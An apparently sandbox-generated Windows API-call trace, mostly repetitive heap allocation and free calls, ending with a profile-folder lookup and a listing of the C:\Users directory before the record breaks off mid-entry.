[0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.705] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x336f4d0 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9188 | out: hHeap=0x2c0000) returned 1 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0218 [0200.707] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.707] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.708] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.708] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.708] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.708] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.708] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.708] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0200.708] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0200.708] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0200.708] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.708] PathFindFileNameW (pszPath="") returned="" [0200.708] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.708] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.708] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x336f4d0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.709] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92a0 | out: hHeap=0x2c0000) returned 1 [0200.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336f4d0 | out: hHeap=0x2c0000) returned 1 [0200.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0200.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0200.709] FindFirstFileW (in: lpFileName="C:\\Users\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0200.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0200.709] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0200.709] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 1 [0200.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cecf0 [0200.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0200.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32cedc8 [0200.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0200.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32cecf0 | out: hHeap=0x2c0000) returned 1 [0200.709] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0200.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0218 [0200.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0200.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0200.709] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0200.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0218 [0200.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0250 [0200.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0200.709] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0218 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0138 [0200.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0288 [0200.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0138 | out: hHeap=0x2c0000) returned 1 [0200.710] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0200.710] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0200.710] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, 